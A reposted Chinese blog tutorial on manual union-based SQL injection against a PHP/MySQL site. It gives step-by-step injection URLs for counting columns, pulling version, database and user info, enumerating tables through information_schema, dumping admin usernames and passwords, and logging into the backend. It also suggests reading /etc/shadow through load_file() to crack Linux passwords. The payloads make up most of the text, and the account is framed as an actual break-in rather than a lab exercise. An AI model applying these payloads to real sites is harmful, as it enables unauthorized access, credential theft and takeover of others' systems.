关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

[转载]php手工注入教程有详细步骤

 feng  555 ℃  0条点评

目前php注入工具个人感觉不是很好用,自己用pangolin老是出错,所以决定写一篇php手工注入的例子。
手工注入在不同条件下,使用的命令和方法也略为不同,我简单说一下。

首先要做的是在判断好字段数后,爆破用户信息,注入的过程中 如果当前数据库连接用户为root或者具有root权限就可以尝试使用loadfile()这个函数来读取文件 比如在linux下我们可以读取 /etc/passwd 和/etc/shadow来暴力破解linux密码
在windows下 我们可以读取 一些常见的文件以及敏感的地方比如 serv-u的配置文件 my.ini等等 ,然后就是一一破解字段和字段内容即可。

第二种情况通过version()函数得知mysql版本在5.0以上,那么可以使用mysql自带的information_schema这个数据库来查询所有的表,然后也是一一破解字段和字段内容即可。
最不好的情况(目前很少了)就是权限不是root,数据库版本过低,那么所有的表,字段都是要自己猜解的,没有工具的情况下,会让工作量加大几十倍,还不一定能猜到,让人汗颜。
下面我就以实例介绍一下目前主流的mysql 5.0版本以上,用information_schema这个数据库来查询所有的表的方法来手工注入。

1.啊d扫到.注入点
http://xxxx.com/x.php?id=x

2. 判断字段数
http://xxx.com/x.php?id=x order by 4
http://xxx.com/x.php?id=x order by 5
order by 4 返回正确页面,order by 5返回错误页面

说明字段数为4,同时网站关闭了回显功能,无法爆出网站物理路径

3. 查看基本信息,一般要用到的几个函数:
version() 版本 database()当前数据库 user()当前用
http://xxx.com/x.php?id=x%20and%201=2%20union%20select%201,2,3,4

http://www.yunsec.net/x.php?id=x%20and%201=2%20union%20select%201,version(),database(),4

http://xxx.com/x.php?id=x%20and%201=2%20union%20select%201,user(),3,4

所以由此可知:
User():a0725135851@W133 database():a0725135851 version():5.1.39-community
(Mysql 版本>=4.0 支持Union 查询 Mysql >=5.0 支持 information_schema 表查询)。

4. 爆表段
http://xxx.com/x.php?id=x+and+1=2+union+select+1,2,table_name,4+from+information_schema.tables+where+table_schema=0x 6130373235313335383531+limit+0,1

爆出来的第一个表是 function
http://xxx.com/x.php?id=x+and+1=2+union+select+1,2,table_name,4+from+information_schema.tables+where+table_schema=0x 6130373235313335383531+limit+1,1

爆出来的第二个表是 member
我们在语句后面添加一个limit0,1 意思是显示第一条数据。如果第一条数据不是管理员表,那么我们就增加一条数据limit1,1,以此类推。
经过测试一共有15个表。
前面的过程相对麻烦下面我介绍一个能直接爆出所有表的简便方法:
http://www.yunsec.net/x.php?id=x+and+1=2+union+select+1,2 ,concat(0x7B317D,group_concat(distinct+table_name),0x7B317D),4+from+information_schema.columns+where+table_schema=0x6130373235313335383531

爆出来了12个表
从这里可以看出来,一次性爆出的表很可能不全,一般情况下,先爆出所有表,如果都不是管理员表,那只能用第一种方法一个一个的爆破。

5.快速爆字段
从15个表综合来看,装载管理员账号的表很可能是username
http://xxx.com/x.php?id=x+and+1=2+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x757365726E616D65

爆出username表内字段有如上5个

6.快速爆字段内容
http://xxx.com/x.php?id=x and 1=2 union select 1,2,group_concat(username,0x5e,psw),4 from username
(0x5e在这里充当间隔符号,换成0x23也是可以的)

得出了账号和密码第一个账户密码为: 程序员5091155

7.用啊d迅速找到了后台
http://xxx.com/admin/login.php

成功登陆后台。

小结:
网上能搜到的php手工注入的方法大多数是我前面说的第一种和第三种方法,实际上很少遇到版本很低,数据库权限是root的情况了,方法自然也是无法再用,这个教程也算是对第二种方法的利用的补充吧。
貌似还有一个专门针对PHP注入的工具,不过,手工练技术,工具省时间。自己选择吧~

网站建设你需要学会哪些知识?
深入黑客生活与黑客同住三年
我是如何打造一款自动化SQL注入工具的我是如何打造一款自动化SQL注入工具的分析勒索软件Cerber的攻击方法分析勒索软件Cerber的攻击方法​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)某个商业定向攻击活动分析某个商业定向攻击活动分析

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码